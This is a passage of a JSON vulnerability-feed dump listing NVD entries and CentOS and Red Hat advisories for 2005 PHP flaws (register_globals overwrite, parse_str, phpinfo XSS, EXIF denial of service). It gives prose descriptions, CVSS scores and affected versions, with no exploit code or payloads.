"cpe:2.3:a:php:php:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2:*:dev:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:patch2:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:34:56", "description": "The exif_read_data function in the Exif module in PHP before 4.4.1 allows remote attackers to cause a denial of service (infinite loop) via a malformed JPEG image.", "edition": 3, "cvss3": {}, "published": "2005-11-18T23:03:00", "title": "CVE-2005-3353", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-3353"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:php:php:4.4.0", "cpe:/a:php:php:4.0.4", "cpe:/a:php:php:4.3.6", "cpe:/a:php:php:4.3.0", "cpe:/a:php:php:4.0.2", "cpe:/a:php:php:4.3.7", "cpe:/a:php:php:4.3.4", "cpe:/a:php:php:4.3.5", "cpe:/a:php:php:4.2.0", "cpe:/a:php:php:4.3.2", "cpe:/a:php:php:4.3.1", "cpe:/a:php:php:4.3.10", "cpe:/a:php:php:4.2.1", "cpe:/a:php:php:4.0.0", "cpe:/a:php:php:4.3.11", "cpe:/a:php:php:4.1.2", "cpe:/a:php:php:4.1.0", "cpe:/a:php:php:4.0.5", "cpe:/a:php:php:4.3.8", "cpe:/a:php:php:4.3.3", "cpe:/a:php:php:4.3.9", "cpe:/a:php:php:4.0.3", "cpe:/a:php:php:4.2.2", "cpe:/a:php:php:4.0.1", "cpe:/a:php:php:4.2.3", "cpe:/a:php:php:4.1.1", "cpe:/a:php:php:4.0.6"], "id": "CVE-2005-3353", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3353", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:php:php:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:34:56", "description": "Cross-site scripting (XSS) vulnerability in the phpinfo function in PHP 4.x up to 4.4.0 and 5.x up to 5.0.5 allows remote attackers to inject arbitrary web script or HTML via a crafted URL with a \"stacked array assignment.\"", "edition": 4, "cvss3": {}, "published": "2005-11-01T12:47:00", "title": "CVE-2005-3388", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-3388"], "modified": "2020-06-23T03:15:00", "cpe": ["cpe:/a:php:php:4.4.0", "cpe:/a:php:php:4.0.4", "cpe:/a:php:php:5.0.1", "cpe:/a:php:php:4.3.6", "cpe:/a:php:php:4.3.0", "cpe:/a:php:php:4.0.2", "cpe:/a:php:php:4.0.7", "cpe:/a:php:php:4.3.7", "cpe:/a:php:php:4.3.4", "cpe:/a:php:php:4.3.5", "cpe:/a:php:php:4.2.0", "cpe:/a:php:php:5.0.2", "cpe:/a:php:php:4.3.2", "cpe:/a:php:php:4.2", "cpe:/a:php:php:4.3.1", "cpe:/a:php:php:4.3.10", "cpe:/a:php:php:4.2.1", "cpe:/a:php:php:5.0.4", "cpe:/a:php:php:4.0.0", "cpe:/a:php:php:4.3.11", "cpe:/a:php:php:4.1.2", "cpe:/a:php:php:4.1.0", "cpe:/a:php:php:4.0.5", "cpe:/a:php:php:4.3.8", "cpe:/a:php:php:4.3.3", "cpe:/a:php:php:4.3.9", "cpe:/a:php:php:4.0.3", "cpe:/a:php:php:5.0.5", "cpe:/a:php:php:4.2.2", "cpe:/a:php:php:4.0.1", "cpe:/a:php:php:5.0.3", "cpe:/a:php:php:4.2.3", "cpe:/a:php:php:4.1.1", "cpe:/a:php:php:5.0.0", "cpe:/a:php:php:4.0.6"], "id": "CVE-2005-3388", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3388", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:php:php:5.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2:*:dev:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:patch2:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:34:56", "description": "The parse_str function in PHP 4.x up to 4.4.0 and 5.x up to 5.0.5, when called with only one parameter, allows remote attackers to enable the register_globals directive via inputs that cause a request to be terminated due to the memory_limit setting, which causes PHP to set an internal flag that enables register_globals and allows attackers to exploit vulnerabilities in PHP applications that would otherwise be protected.", "edition": 3, "cvss3": {}, "published": "2005-11-01T12:47:00", "title": "CVE-2005-3389", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-3389"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:php:php:4.4.0", "cpe:/a:php:php:4.0.4", "cpe:/a:php:php:5.0.1", "cpe:/a:php:php:4.3.6", "cpe:/a:php:php:4.3.0", "cpe:/a:php:php:4.0.2", "cpe:/a:php:php:4.0.7", "cpe:/a:php:php:4.3.7", "cpe:/a:php:php:4.3.4", "cpe:/a:php:php:4.3.5", "cpe:/a:php:php:4.2.0", "cpe:/a:php:php:5.0.2", "cpe:/a:php:php:4.3.2", "cpe:/a:php:php:4.2", "cpe:/a:php:php:4.3.1", "cpe:/a:php:php:4.3.10", "cpe:/a:php:php:4.2.1", "cpe:/a:php:php:5.0.4", "cpe:/a:php:php:4.0.0", "cpe:/a:php:php:4.3.11", "cpe:/a:php:php:4.1.2", "cpe:/a:php:php:4.1.0", "cpe:/a:php:php:4.0.5", "cpe:/a:php:php:4.3.8", "cpe:/a:php:php:4.3.3", "cpe:/a:php:php:4.3.9", "cpe:/a:php:php:4.0.3", "cpe:/a:php:php:5.0.5", "cpe:/a:php:php:4.2.2", "cpe:/a:php:php:4.0.1", "cpe:/a:php:php:5.0.3", "cpe:/a:php:php:4.2.3", "cpe:/a:php:php:4.1.1", "cpe:/a:php:php:5.0.0", "cpe:/a:php:php:4.0.6"], "id": "CVE-2005-3389", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3389", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:php:php:5.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2:*:dev:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:patch2:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:*:*:*:*:*:*:*"]}], "centos": [{"lastseen": "2019-12-20T18:25:25", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3353", "CVE-2005-3388", "CVE-2005-3389", "CVE-2005-3390"], "description": "**CentOS Errata and Security Advisory** CESA-2005:831\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server.\r\n\r\nA flaw was found in the way PHP registers global variables during a file\r\nupload request. A remote attacker could submit a carefully crafted\r\nmultipart/form-data POST request that would overwrite the $GLOBALS array,\r\naltering expected script behavior, and possibly leading to the execution of\r\narbitrary PHP commands. Please note that this vulnerability only affects\r\ninstallations which have register_globals enabled in the PHP configuration\r\nfile, which is not a default or recommended option. The Common\r\nVulnerabilities and Exposures project assigned the name CVE-2005-3390 to\r\nthis issue.\r\n\r\nA flaw was found in the PHP parse_str() function. If a PHP script passes\r\nonly one argument to the parse_str() function, and the script can be forced\r\nto abort execution during operation (for example due to the memory_limit\r\nsetting), the register_globals may be enabled even if it is disabled in the\r\nPHP configuration file. This vulnerability only affects installations that\r\nhave PHP scripts using the parse_str function in this way. (CVE-2005-3389)\r\n\r\nA Cross-Site Scripting flaw was found in the phpinfo() function. If a\r\nvictim can be tricked into following a malicious URL to a site with a page\r\ndisplaying the phpinfo() output, it may be possible to inject javascript\r\nor HTML content into the displayed page or steal data such as cookies. \r\nThis vulnerability only affects installations which allow users to view the\r\noutput of the phpinfo() function. As the phpinfo() function outputs a\r\nlarge amount of information about the current state of PHP, it should only\r\nbe used during debugging or if protected by authentication. (CVE-2005-3388)\r\n\r\nA denial of service flaw was found in the way PHP processes EXIF image\r\ndata. It is possible for an attacker to cause PHP to crash by supplying\r\ncarefully crafted EXIF image data. (CVE-2005-3353)\r\n\r\nUsers of PHP should upgrade to these updated packages, which contain\r\nbackported patches that resolve these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2005-November/024431.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-November/024432.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-November/024433.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-November/024438.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-November/024439.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-November/024440.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-November/024448.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-November/024452.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-November/024453.html\n\n**Affected packages:**\nphp\nphp-devel\nphp-domxml\nphp-gd\nphp-imap\nphp-ldap\nphp-mbstring\nphp-mysql\nphp-ncurses\nphp-odbc\nphp-pear\nphp-pgsql\nphp-snmp\nphp-xmlrpc\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2005-831.html", "edition": 4, "modified": "2005-11-12T14:59:07", "published": "2005-11-11T01:54:54", "href": "http://lists.centos.org/pipermail/centos-announce/2005-November/024431.html", "id": "CESA-2005:831", "title": "php security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-24T20:33:43", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3353", "CVE-2005-3388", "CVE-2005-3389", "CVE-2005-3390"], "description": "**CentOS Errata and Security Advisory** CESA-2005:1110-001\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2005-November/024436.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-November/024437.html\n\n**Affected packages:**\nphp\nphp-bcmath\nphp-dba\nphp-devel\nphp-gd\nphp-imap\nphp-ldap\nphp-mbstring\nphp-mysql\nphp-ncurses\nphp-odbc\nphp-pear\nphp-pgsql\nphp-snmp\nphp-soap\nphp-xml\nphp-xmlrpc\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2005-831.html", "edition": 30, "modified": "2005-11-11T03:55:21", "published": "2005-11-11T03:54:29", "href": "http://lists.centos.org/pipermail/centos-announce/2005-November/024436.html", "id": "CESA-2005:1110-001", "title": "php security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-20T18:28:36", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3388", "CVE-2005-3389", "CVE-2005-3390", "CVE-2004-1019"], "description": "**CentOS Errata and Security Advisory** CESA-2005:838-01\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server.\r\n\r\nA flaw was found in the way PHP registers global variables during a file\r\nupload request. A remote attacker could submit a carefully crafted\r\nmultipart/form-data POST request that would overwrite the $GLOBALS array,\r\naltering expected script behavior, and possibly leading to the execution of\r\narbitrary PHP commands. Note that this vulnerability only affects\r\ninstallations which have register_globals enabled in the PHP configuration\r\nfile, which is not a default or recommended option. The Common\r\nVulnerabilities and Exposures project assigned the name CVE-2005-3390 to\r\nthis issue.\r\n\r\nA flaw was found in the PHP parse_str() function. If a PHP script passes\r\nonly one argument to the parse_str() function, and the script can be forced\r\nto abort execution during operation (for example due to the memory_limit\r\nsetting), the register_globals may be enabled even if it is disabled in the\r\nPHP configuration file. This vulnerability only affects installations that\r\nhave PHP scripts using the parse_str function in this way. (CVE-2005-3389)\r\n\r\nA Cross-Site Scripting flaw was found in the phpinfo() function. If a\r\nvictim can be tricked into following a malicious URL to a site with a page\r\ndisplaying the phpinfo() output, it may be possible to inject javascript\r\nor HTML content into the displayed page or steal data such as cookies. \r\nThis vulnerability only affects installations which allow users to view the\r\noutput of the phpinfo() function. As the phpinfo() function outputs a\r\nlarge amount of information about the current state of PHP, it should only\r\nbe used during debugging or if protected by authentication. (CVE-2005-3388)\r\n\r\nAdditionally, a bug introduced in the updates to fix CVE-2004-1019 has been\r\ncorrected.\r\n\r\nUsers of PHP should upgrade to these updated packages, which contain\r\nbackported patches that resolve these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2005-November/024430.html\n\n**Affected packages:**\nphp\nphp-devel\nphp-imap\nphp-ldap\nphp-manual\nphp-mysql\nphp-odbc\nphp-pgsql\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "edition": 5, "modified": "2005-11-10T23:45:48", "published": "2005-11-10T23:45:48", "href": "http://lists.centos.org/pipermail/centos-announce/2005-November/024430.html", "id": "CESA-2005:838-01", "title": "php security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:44:48", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3353", "CVE-2005-3388", "CVE-2005-3389", "CVE-2005-3390"], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server.\r\n\r\nA flaw was found in the way PHP registers global variables during a file\r\nupload request. A remote attacker could submit a carefully crafted\r\nmultipart/form-data POST request that would overwrite the $GLOBALS array,\r\naltering expected script behavior, and possibly leading to the execution of\r\narbitrary PHP commands. Please note that this vulnerability only affects\r\ninstallations which have register_globals enabled in the PHP configuration\r\nfile, which is not a default or recommended option. The Common\r\nVulnerabilities and Exposures project assigned the name CVE-2005-3390 to\r\nthis issue.\r\n\r\nA flaw was found in the PHP parse_str() function. If a PHP script passes\r\nonly one argument to the parse_str() function, and the script can be forced\r\nto abort execution during operation (for example due to the memory_limit\r\nsetting), the register_globals may be enabled even if it is disabled in the\r\nPHP configuration file. This vulnerability only affects installations that\r\nhave PHP scripts using the parse_str function in this way. (CVE-2005-3389)\r\n\r\nA Cross-Site Scripting flaw was found in the phpinfo() function. If a\r\nvictim can be tricked into following a malicious URL to a site with a page\r\ndisplaying the phpinfo() output, it may be possible to inject javascript\r\nor HTML content into the displayed page or steal data such as cookies. \r\nThis vulnerability only affects installations which allow users to view the\r\noutput of the phpinfo() function. As the phpinfo() function outputs a\r\nlarge amount of information about the current state of PHP, it should only\r\nbe used during debugging or if protected by authentication. (CVE-2005-3388)\r\n\r\nA denial of service flaw was found in the way PHP processes EXIF image\r\ndata. It is possible for an attacker to cause PHP to crash by supplying\r\ncarefully crafted EXIF image data. (CVE-2005-3353)\r\n\r\nUsers of PHP should upgrade to these updated packages, which contain\r\nbackported patches that resolve these issues.", "modified": "2017-09-08T12:07:16", "published": "2005-11-10T05:00:00", "id": "RHSA-2005:831", "href": "https://access.redhat.com/errata/RHSA-2005:831", "type": "redhat", "title": "(RHSA-2005:831) php security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:37", "bulletinFamily": "unix", "cvelist": ["CVE-2004-1019", "CVE-2005-3388", "CVE-2005-3389", "CVE-2005-3390"], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server.\r\n\r\nA flaw was found in the way PHP registers global variables during a file\r\nupload request. A remote attacker could submit a carefully crafted\r\nmultipart/form-data POST request that would overwrite the $GLOBALS array,\r\naltering expected script behavior, and possibly leading to the execution of\r\narbitrary PHP commands. Note that this vulnerability only affects\r\ninstallations which have register_globals enabled in the PHP configuration\r\nfile, which is not a default or recommended option. The Common\r\nVulnerabilities and Exposures project assigned the name CVE-2005-3390 to\r\nthis issue.\r\n\r\nA flaw was found in the PHP parse_str() function. If a PHP script passes\r\nonly one argument to the parse_str() function, and the script can be forced\r\nto abort execution during operation (for example due to the memory_limit\r\nsetting), the register_globals may be enabled even if it is disabled in the\r\nPHP configuration file. This vulnerability only affects installations that\r\nhave PHP scripts using the parse_str function in this way. (CVE-2005-3389)\r\n\r\nA Cross-Site Scripting flaw was found in the phpinfo() function. If 